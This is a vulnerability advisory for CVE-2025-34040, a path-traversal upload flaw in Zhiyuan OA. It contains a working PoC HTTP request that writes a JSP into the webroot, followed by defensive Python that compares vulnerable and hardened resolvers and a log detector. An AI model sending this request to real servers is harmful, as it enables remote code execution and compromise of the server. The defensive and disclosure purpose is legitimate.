# Exploit Title: Zhiyuan OA - arbitrary file upload leading to remote code execution (path traversal in wpsAssistServlet)
# Google Dork / FOFA: app="致远互联-OA" && title="V8.0SP2"
# Date: 1-11-2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://service.seeyon.com/
# Software Link: [vendor download / product page if available]
# Version: 5.0, 5.1–5.6sp1, 6.0–6.1sp2, 7.0–7.1sp1, 8.0–8.0sp2 (per NVD/VulnCheck)
# Tested on: MacOS
# CVE: CVE-2025-34040

Description:
A path-traversal flaw (improper input validation) in the multipart file upload handling of Zhiyuan OA's `wpsAssistServlet` allows an unauthenticated actor (or any actor able to reach the upload endpoint) to write crafted files outside the intended upload directories by controlling the `realFileType` and `fileId` parameters. On affected configurations an uploaded JSP can be stored under the webroot and executed by the servlet container, yielding remote code execution.

Reproduction outline:
Send a multipart/form-data POST to `/seeyon/wpsAssistServlet`. The `realFileType` parameter is used to resolve the target path; insufficient validation permits `..` sequences, so the write lands under the webapp root instead of the upload directory. The write only becomes code execution when the uploaded body is server-side executable content (e.g., JSP) placed where the container serves it; the PoC below uses a harmless JSP that only prints a string.

Verification:
If the write succeeded, a GET for `/Hello.jsp` on the target should return `HelloWorld`. Apply the vendor patch (see References) and restrict network access to the servlet; in access logs, any `wpsAssistServlet` request whose `realFileType` contains `..` or a `.jsp` suffix is an exploitation attempt.

Impact:
- Remote code execution if the written file lands under a path the container serves and executes.
- Complete server compromise and pivoting into internal networks.
- Data exfiltration, persistence, and further lateral movement.

References:
- NVD: CVE-2025-34040 (entry awaiting enrichment)
- VulnCheck advisory: https://vulncheck.com/advisories/zhiyuan-oa-system-path-traversal-file-upload
- CNVD entry: https://www.cnvd.org.cn/flaw/show/CNVD-2021-01627
- Vendor patch/notice: https://service.seeyon.com/patchtools/tp.html

PoC:

POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=......
Accept-Encoding: gzip

--......
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel

<% out.println("HelloWorld");%>
--......--
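The following is an added example, not code from the advisory or from Zhiyuan OA. It models the path-resolution defect described above (an assumed structure: upload base + fileId + realFileType joined without canonicalisation or an allow-list), shows a hardened resolver beside it, and includes a log check that flags the PoC request line. The upload directory, the allow-list of document suffixes, and the `/opt/Seeyon/...` layout are assumptions for illustration; only `realFileType`, `fileId`, `flag=save` and the traversal value come from the PoC.

```python
"""Added example (not the advisory's or the vendor's code): vulnerable vs. hardened
path resolution for wpsAssistServlet-style uploads, plus a log-line check."""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical upload directory. Only the traversal depth in the PoC (four "..")
# matters for the demonstration; the absolute prefix is an assumption.
UPLOAD_BASE = "/opt/Seeyon/A8/base/upload"

# Hypothetical allow-list of office-document suffixes the servlet is meant to store.
ALLOWED_TYPES = frozenset({"doc", "docx", "xls", "xlsx", "ppt", "pptx", "wps", "et", "dps"})

# Parameter values taken from the advisory's PoC request.
POC_REAL_FILE_TYPE = "../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp"
POC_FILE_ID = "2"


def vulnerable_resolve(real_file_type: str, file_id: str) -> str:
    """Models the defect (assumed structure): fileId and realFileType are spliced
    into the target path with no canonicalisation or allow-list, so '..' in
    realFileType walks out of UPLOAD_BASE."""
    return posixpath.normpath(posixpath.join(UPLOAD_BASE, file_id, real_file_type))


def safe_resolve(real_file_type: str, file_id: str) -> str:
    """Hardened version: both parameters must match a strict shape, and the
    normalised result must still lie under UPLOAD_BASE."""
    if not re.fullmatch(r"[0-9]{1,20}", file_id):
        raise ValueError("fileId must be numeric")
    ext = real_file_type.lower()
    if ext not in ALLOWED_TYPES:
        raise ValueError(f"realFileType not allowed: {real_file_type!r}")
    target = posixpath.normpath(posixpath.join(UPLOAD_BASE, f"{file_id}.{ext}"))
    # Defence in depth: even if the allow-list is loosened later, refuse any
    # result that escapes the base directory. Production code should also run
    # os.path.realpath on the result so symlinks cannot bypass the prefix check.
    if posixpath.commonpath([UPLOAD_BASE, target]) != UPLOAD_BASE:
        raise ValueError("target escapes upload directory")
    return target


def is_exploit_attempt(request_line: str) -> bool:
    """Detection check for an access-log request line: a POST to
    wpsAssistServlet whose realFileType carries traversal, a path separator,
    or a container-executable suffix. parse_qs percent-decodes, so %2e%2e%2f
    variants are caught as well."""
    try:
        method, target, _ = request_line.split(" ", 2)
    except ValueError:
        return False
    parts = urlsplit(target)
    if method != "POST" or not parts.path.endswith("/seeyon/wpsAssistServlet"):
        return False
    for value in parse_qs(parts.query).get("realFileType", []):
        v = value.replace("\\", "/").lower()
        if ".." in v or "/" in v or re.search(r"\.(jsp|jspx|jspf|class|jar)$", v):
            return True
    return False


if __name__ == "__main__":
    print("vulnerable resolves to:", vulnerable_resolve(POC_REAL_FILE_TYPE, POC_FILE_ID))
    try:
        safe_resolve(POC_REAL_FILE_TYPE, POC_FILE_ID)
    except ValueError as err:
        print("hardened rejects PoC:", err)
    print("hardened accepts:", safe_resolve("xls", POC_FILE_ID))
    line = ("POST /seeyon/wpsAssistServlet?flag=save&realFileType="
            + POC_REAL_FILE_TYPE + "&fileId=2 HTTP/1.1")
    print("PoC line flagged:", is_exploit_attempt(line))
```

Under the assumed layout the vulnerable resolver turns the PoC parameters into `/opt/Seeyon/ApacheJetspeed/webapps/ROOT/Hello.jsp`, which is exactly the container-served location the advisory describes; the hardened resolver rejects the same input before any path is built, and the log check flags the request line whether the traversal is literal or percent-encoded.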